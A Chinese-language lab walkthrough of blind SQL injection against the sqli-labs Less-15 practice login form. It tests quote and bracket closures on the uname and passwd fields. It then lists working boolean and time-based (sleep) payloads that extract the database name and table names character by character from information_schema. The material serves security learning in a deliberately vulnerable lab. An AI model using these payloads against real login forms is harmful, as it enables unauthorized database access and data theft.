1、访问首页,/Less-15/index.php,这里的传参点是表单中的uname、passwd
- 判断是否是数字形传参
- 判断是否有单引号闭合
- 判断是否是双引号闭合
- 判断是否单引号+括号闭合
- 判断是否是双引号+括号闭合
如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入
分析:这里同时存在布尔型(延时)注入,哪这里可以使用盲注 或 延时盲注来做这个题。
2、使用盲注获取数据库长度
-- 盲注
admin' and length(database())=8-- qwe-- qwe
-- 延时盲注
admin' and if(length(database())=8,sleep(10),0)-- qwe
3、获取数据库名称
-- 盲注判断数据库第一个字符
admin' and ascii(substr(database(),1,1))=115-- qwe
-- 延时盲注判断数据库第一个字符
admin' and if(ascii(substr(database(),1,1))=115,sleep(10),0)-- qwe
备注:这里数据库名称一共是8位,我这用一位做演示,其余7位按顺序一位位截取判断即可
4、获取表名长度
-- 盲注查询表名长度
admin' and length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5-- qwe
-- 延时盲注查询表名长度
admin' and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(10),0)-- qwe
5、获取表名称
-- 通过盲注判断表名
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117-- qwe
-- 通过延时盲注判断表名
admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(10),0)-- qwe
...获取字段名,都采用同样的操作即可,语法一样,只是查询语句变一下而己,就不一一尝试了,这里主要是让自己熟悉盲注与延时盲注的语法。